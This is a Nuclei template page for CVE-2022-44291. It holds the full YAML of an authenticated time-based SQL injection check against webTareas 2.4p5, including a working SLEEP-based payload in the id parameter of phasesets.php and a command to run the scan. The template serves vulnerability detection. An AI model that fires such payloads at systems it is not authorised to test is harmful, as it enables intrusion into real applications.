Skip to content
Nuclei Templates

WebTareas 2.4p5 - SQL Injection

ID: CVE-2022-44291

Severity: critical

Author: theamanrawat

Tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project

Description

Section titled “Description”

webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.

YAML Source

Section titled “YAML Source”
id: CVE-2022-44291


info:
  name: WebTareas 2.4p5 - SQL Injection
  author: theamanrawat
  severity: critical
  description: |
    webTareas 2.4p5 was discovered to contain a SQL injection vulnerability via the id parameter in phasesets.php.
  reference:
    - http://webtareas.com/
    - https://github.com/anhdq201/webtareas/issues/1
    - https://nvd.nist.gov/vuln/detail/CVE-2022-44291
    - http://webtareas.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-44291
    cwe-id: CWE-89
    epss-score: 0.01336
    epss-percentile: 0.8578
    cpe: cpe:2.3:a:webtareas_project:webtareas:2.4:p5:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: webtareas_project
    product: webtareas
  tags: time-based-sqli,cve,cve2022,sqli,webtareas,authenticated,intrusive,webtareas_project


http:
  - raw:
      - |
        POST /general/login.php?session=false HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=---------------------------3023071625140724693672385525


        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="action"


        login
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="loginForm"


        {{username}}
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="passwordForm"


        {{password}}
        -----------------------------3023071625140724693672385525
        Content-Disposition: form-data; name="loginSubmit"


        Log In
        -----------------------------3023071625140724693672385525--
      - |
        @timeout: 20s
        GET /administration/phasesets.php?mode=delete&id=1)+AND+(SELECT+3830+FROM+(SELECT(SLEEP(6)))MbGE)+AND+(6162=6162 HTTP/1.1
        Host: {{Hostname}}


    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=6'
          - 'len(body_2) == 0'
          - 'status_code_2 == 302'
          - 'contains(header_2, "text/html")'
          - 'contains(body_1, "webTareasSID")'
        condition: and
# digest: 4a0a00473045022100a5b44d4113406a37d4dc9ffaab3ac099fd88c8df29fc73a9faac421783cfca5b02207f3dc0b0107ecbb5318d9b12e4f315408b4ca5e85ae7b913be4c5db47c00b47a:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2022/CVE-2022-44291.yaml"

View on Github